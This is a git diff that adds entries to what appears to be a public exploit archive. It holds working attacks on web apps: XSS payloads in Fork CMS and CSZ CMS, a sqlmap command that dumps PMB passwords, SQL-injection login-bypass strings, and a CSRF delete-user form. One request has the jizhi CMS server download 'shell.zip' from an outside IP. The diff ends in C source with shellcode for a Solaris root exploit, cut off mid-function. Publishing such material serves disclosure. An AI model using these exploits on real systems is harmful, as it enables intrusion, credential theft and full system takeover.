+<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
+btn-default btn-xs pull-right">
+<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td>
+</tr></tbody>
+
+
+PoC: Vulnerable Source (Delete User - On Interaction)
+<form name="delete" method="post"
+action="/private/en/users/delete?token=k7byefqor8">
+<input type="hidden" id="delete__token" name="delete[_token]"
+value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
+<input type="hidden" id="delete_id" name="delete[id]" value="2" />
+<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
+aria-hidden="true" aria-labelledby="confirmDeleteTitle">
+<div class="modal-dialog"><div class="modal-content"><div
+class="modal-header">
+<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
+<div class="modal-body">
+<p>Are your sure you want to delete the user "evil.source"><iframe
+src=evil.source onload=alert(document.cookie)>"?</p></div>
+<div class="modal-footer">
+<button class="btn btn-default" title="Cancel" data-dismiss="modal">
+<span class="fa fa-times" aria-hidden="true"></span>
+<span class="btn-text">Cancel</span></button>
+<button class="btn btn-danger" title="Delete" >
+<span class="fa fa-trash" aria-hidden="true"></span>
+<span class="btn-text">Delete</span>
+</button></div></div></div></div>
+</form>
+
+
+--- PoC Session Logs [POST] (Registration User Account) ---
+https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 179
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie:
+track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;
+
+interface_language=en; frontend_language=en; cookie_bar_agree=Y;
+cookie_bar_hide=Y;
+form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
+src=evil.source
+onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
+Max-Age=2592000;
+path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
+track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
+13-Apr-2021 09:49:57 GMT;
+Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location: https://fork-cms.localhost:8080
+X-server: fork01
+
+
+-- PoC Session Logs [POST] (Add User) ---
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Content-Type: multipart/form-data;
+boundary=---------------------------56051791419552543783889366402
+Content-Length: 2545
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+Upgrade-Insecure-Requests: 1
+form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
+&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
+src=a onload=alert(document.cookie)>&avatar=
+&interface_language=en&preferred_editor=ck-editor&date_format=j F
+Y&time_format=H:i&number_format=dot_nothing
+&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location:
+/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-4
+X-server: fork01
+-
+https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-4
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+-
+POST: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Content-Length: 3615
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Vary: Accept-Encoding
+Content-Encoding: gzip
+X-server: fork01
+-
+GET: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+https://fork-cms.localhost:8080/private/en/users/evil.source
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location: /private/en/error?type=action-not-allowed
+X-server: fork01
+
+
+-- PoC Session Logs [POST] (Edit User) ---
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Content-Type: multipart/form-data;
+boundary=---------------------------388544425912514902093103180709
+Content-Length: 2563
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
+&nickname=test3>"<iframe src=evil.source
+onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
+&interface_language=en&preferred_editor=ck-editor&date_format=j F
+Y&time_format=H:i&number_format=dot_nothing&
+csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location:
+/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
+onload=alert(document.cookie)>&highlight=row-2
+X-server: fork01
+https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-2
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+-
+POST: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Content-Length: 3585
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
+Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Vary: Accept-Encoding
+Content-Encoding: gzip
+X-server: fork01
+
+
+Reference(s):
+https://fork-cms.localhost:8080/en/modules/profiles/register
+https://fork-cms.localhost:8080/private/en/profiles/index
+https://fork-cms.localhost:8080/private/en/users/index
+https://fork-cms.localhost:8080/private/en/users/edit
+https://fork-cms.localhost:8080/private/en/users/add
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerabilities
+in the fork cms web-application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48354.txt b/exploits/php/webapps/48354.txt
new file mode 100644
index 000000000..c97757266
--- /dev/null
+++ b/exploits/php/webapps/48354.txt
@@ -0,0 +1,32 @@
+# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://sourceforge.net/projects/cszcms/
+# Version: v1.2.7
+# Description:
+# Unauthorized user that has access private message can embed Javascript
+# code to admin panel.
+
+# Steps to reproduce:
+1- Log in to member panel.
+1- Change user-agent header as <script>alert(1)</script>
+2- Send the private message to admin user.
+3- When admin user logs in to Backend System Dashboard, an alert box pops
+up on screen.
+
+PoC Request:
+
+POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
+Host: localhost
+User-Agent: <script>alert(1)</script>
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 152
+Cookie: cszcookie
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
\ No newline at end of file
diff --git a/exploits/php/webapps/48356.txt b/exploits/php/webapps/48356.txt
new file mode 100644
index 000000000..fce82ae1b
--- /dev/null
+++ b/exploits/php/webapps/48356.txt
@@ -0,0 +1,43 @@
+# Exploit Title: PMB 5.6 - 'logid' SQL Injection
+# Google Dork: inurl:opac_css
+# Date: 2020-04-20
+# Exploit Author: 41-trk (Tarik Bakir)
+# Vendor Homepage: http://www.sigb.net
+# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
+# Affected versions : <= 5.6
+
+-==== Software Description ====-
+
+PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
+We are some librarians, users and developers deploring this state of affairs.
+
+PMB is based on web technology. This is what we sometimes call a 'web-app'.
+PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
+
+The main functions of PMB are :
+
+ * Supporting the UNIMARC format
+ * Authorities management (authors, publishers, series, subjects...)
+ * Management of loans, holds, borrowers...
+ * A user-friendly configuration
+ * The ability to import full bibliographic records
+ * A user-friendly OPAC integrating a browser
+ * Loans management with a module designed to serve even the very small establishments
+ * Serials management
+ * Simple administration procedures that can be handled easily even by the library staff...
+
+-==== Vulnerability ====-
+
+Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.
+
+-==== POC ====-
+
+http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]
+
+Using SQLMAP :
+
+./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords
+
+-==== Exploit requirements ====-
+
+- You will need to be logged in in order to exploit the vulnerability.
\ No newline at end of file
diff --git a/exploits/php/webapps/48357.txt b/exploits/php/webapps/48357.txt
new file mode 100644
index 000000000..1b33d4bfa
--- /dev/null
+++ b/exploits/php/webapps/48357.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://sourceforge.net/projects/cszcms/
+# Version: v1.2.7
+# Description:
+# Authenticated user can inject hyperlink to Backend System Dashboard and
+# Member Dashboard via message.
+
+PoC Request:
+
+POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 196
+Cookie: cszcookie
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
+click to view</a></b></h1>&message=phishing&submit=Send
\ No newline at end of file
diff --git a/exploits/php/webapps/48361.txt b/exploits/php/webapps/48361.txt
new file mode 100644
index 000000000..111f38335
--- /dev/null
+++ b/exploits/php/webapps/48361.txt
@@ -0,0 +1,46 @@
+# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
+# Google Dork: jizhicms
+# Date: 2020-04-18
+# Exploit Author: iej1ctk1g
+# Vendor Homepage: https://www.jizhicms.cn/
+# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
+# Version: 1.6.7
+# Tested on: Mac OS
+# CVE : N/A
+
+Data 1.
+
+POST /admin.php/Plugins/update.html HTTP/1.1
+Host: 192.168.1.253:8888
+Content-Length: 86
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.1.253:8888
+Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
+Connection: close
+
+action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip
+
+
+Data 2.
+
+POST /admin.php/Plugins/update.html HTTP/1.1
+Host: 192.168.1.253:8888
+Content-Length: 32
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.1.253:8888
+Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
+Connection: close
+
+action=file-upzip&filepath=shell
\ No newline at end of file
diff --git a/exploits/php/webapps/48368.txt b/exploits/php/webapps/48368.txt
new file mode 100644
index 000000000..457a98a70
--- /dev/null
+++ b/exploits/php/webapps/48368.txt
@@ -0,0 +1,50 @@
+# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['signup']))
+{
+$fname=$_POST['fname'];
+$lname=$_POST['lname'];
+$email=$_POST['email'];
+$password=$_POST['password'];
+$contact=$_POST['contact'];
+$enc_password=$password;
+$msg=mysqli_query($con,"insert into
+users(fname,lname,email,password,contactno)
+values('$fname','$lname','$email','$enc_password','$contact')");
+if($msg)
+{
+echo "<script>alert('Register successfully');</script>";
+}
+}
+
+2- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<?php $ret=mysqli_query($con,"select * from users");
+$cnt=1;
+while($row=mysqli_fetch_array($ret))
+{?>
+<tr>
+<td><?php echo $cnt;?></td>
+<td><?php echo $row['fname'];?></td>
+<td><?php echo $row['lname'];?></td>
+<td><?php echo $row['email'];?></td>
+<td><?php echo $row['contactno'];?></td> <td><?php echo
+$row['posting_date'];?></td>
+</tr>
+
+4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
+perform this attack as "Stored XSS"
\ No newline at end of file
diff --git a/exploits/php/webapps/48369.txt b/exploits/php/webapps/48369.txt
new file mode 100644
index 000000000..5fe1b5d54
--- /dev/null
+++ b/exploits/php/webapps/48369.txt
@@ -0,0 +1,49 @@
+# Exploit Title: User Management System 2.0 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+------ Details:
+
+1- Vulnerable code is here (admin login: /admin/index.php):
+
+<?php
+session_start();
+include("dbconnection.php");
+if(isset($_POST['login']))
+{
+ $adminusername=$_POST['username'];
+ $pass=md5($_POST['password']);
+ $ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$adminusername' and password='$pass'");
+ $num=mysqli_fetch_array($ret);
+if($num>0)
+{
+ $extra="manage-users.php";
+ $_SESSION['login']=$_POST['username'];
+ $_SESSION['id']=$num['id'];
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+else
+{
+ $_SESSION['action1']="*Invalid username or password";
+ $extra="index.php";
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+}
+
+2- We can bypass authentication with SQLi:
+
+Bypass code (user and admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
\ No newline at end of file
diff --git a/exploits/php/webapps/48370.txt b/exploits/php/webapps/48370.txt
new file mode 100644
index 000000000..7f1ad6b7c
--- /dev/null
+++ b/exploits/php/webapps/48370.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here: http://localhost/cms/users/registration.php
+2- Vulnerable code:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['submit']))
+{
+$fullname=$_POST['fullname'];
+$email=$_POST['email'];
+$password=md5($_POST['password']);
+$contactno=$_POST['contactno'];
+$status=1;
+$query=mysqli_query($con,"insert into
+users(fullName,userEmail,password,contactNo,status)
+values('$fullname','$email','$password','$contactno','$status')");
+$msg="Registration successfull. Now You can login !";
+}
+?>
+
+3- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<tr>
+<td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td>
+</tr>
+
+4- If we insert "fullName" as "script>prompt(2)</script>", we can perform
+this attack as "Stored XSS"
+
+5- Picture in the Attachemnt
+---------------------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48371.txt b/exploits/php/webapps/48371.txt
new file mode 100644
index 000000000..681c6b849
--- /dev/null
+++ b/exploits/php/webapps/48371.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Complaint Management System 4.2 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+if(isset($_POST['submit']))
+{
+$username=$_POST['username'];
+$password=md5($_POST['password']);
+$ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$username' and password='$password'");
+$num=mysqli_fetch_array($ret);
+if($num>0)
+{
+$extra="change-password.php";//
+$_SESSION['alogin']=$_POST['username'];
+$_SESSION['id']=$num['id'];
+$host=$_SERVER['HTTP_HOST'];
+$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
+header("location:http://$host$uri/$extra");
+exit();
+}
+
+2- We can bypass authentication with SQLi:
+
+Bypass code (admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
+-----------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48372.txt b/exploits/php/webapps/48372.txt
new file mode 100644
index 000000000..61f2dda41
--- /dev/null
+++ b/exploits/php/webapps/48372.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+*************************************************
+Detail:
+
+You can perform CSRF Attack for all the functions.
+
+----------------------------------------------
+
+CSRF PoC for Delete User
+----------------------------------------------
+This request performs over the GET request with uid.
+------------------------------------------------------------------------
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://localhost/cms/admin/manage-users.php">
+<input type="hidden" name="uid" value="4" />
+<input type="hidden" name="" value="" />
+<input type="hidden" name="action" value="del" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/solaris/local/48359.c b/exploits/solaris/local/48359.c
new file mode 100644
index 000000000..1895c1312
--- /dev/null
+++ b/exploits/solaris/local/48359.c
@@ -0,0 +1,320 @@
+# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation
+# Date: 2020-04-21
+# Author: Marco Ivaldi
+# Vendor: www.oracle.com
+# CVE: CVE-2020-2944
+
+/*
+ * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
+ * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * A buffer overflow in the _SanityCheck() function in the Common Desktop
+ * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
+ * earlier allows local users to gain root privileges via a long calendar name
+ * or calendar owner passed to sdtcm_convert in a malicious calendar file
+ * (CVE-2020-2944).
+ *
+ * The open source version of CDE (based on the CDE 2.x codebase) is not
+ * affected, because it does not ship the vulnerable binary.
+ *
+ * "CDE, the gift that keeps on giving" -- @0xdea
+ * "Feels more like a curse you can't break from this side." -- @alanc
+ *
+ * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
+ * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
+ * space, try returning to sprintf() instead of strcpy().
+ *
+ * I haven't written a Solaris/SPARC version because I don't have a SPARC box
+ * on which Solaris 10 can run. If anybody is kind enough to give me access to
+ * such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
+ *
+ * Usage:
+ * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
+ * $ ./raptor_sdtcm_conv
+ * [...]
+ * Do you want to correct it? (Y/N) [Y] n
+ * # id
+ * uid=0(root) gid=1(other) egid=12(daemon)
+ * #
+ *
+ * This should work with any common configuration on the first try. To
+ * re-enable rpc.cmsd, clear its service maintenance status by running the
+ * following commands as root:
+ * # /usr/sbin/svcadm clear cde-calendar-manager
+ * # /usr/bin/svcs -a | grep calendar
+ * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also likely vulnerable]
+ */
+
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/systeminfo.h>
+#include <sys/types.h>
+
+#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
+#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program
+#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility
+#define BUFSIZE 2304 // size of the name/owner
+#define PAYSIZE 1024 // size of the payload
+#define OFFSET env_len / 2 // offset to the shellcode
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char *env[256];
+int env_pos = 0, env_len = 0;
+
+/* prototypes */
+int add_env(char *string);
+void check_zero(int addr, char *pattern);
+int search_ldso(char *sym);
+int search_rwx_mem(void);
+void set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+ char buf[BUFSIZE], payload[PAYSIZE];
+ char platform[256], release[256], hostname[256];
+ int i, payaddr;
+
+ char *arg[3] = {"foo", "hax0r", NULL};
+ int sb = ((int)argv[0] | 0xfff); /* stack base */
+ int ret = search_ldso("strcpy"); /* or sprintf */
+ int rwx_mem = search_rwx_mem(); /* rwx memory */
+
+ char cmd[1024];
+ FILE *fp;
+
+ /* print exploit information */
+ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+ /* read command line */
+ if (argc != 1) {
+ fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
+ fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
+ exit(1);
+ }
+
+ /* get system information */
+ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+ sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+ sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);
+
+ /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
+ memset(payload, '\x90', PAYSIZE);
+ payload[PAYSIZE - 1] = 0x0;
+ memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
+
+ /* fill the envp, keeping padding */
+ add_env(payload);
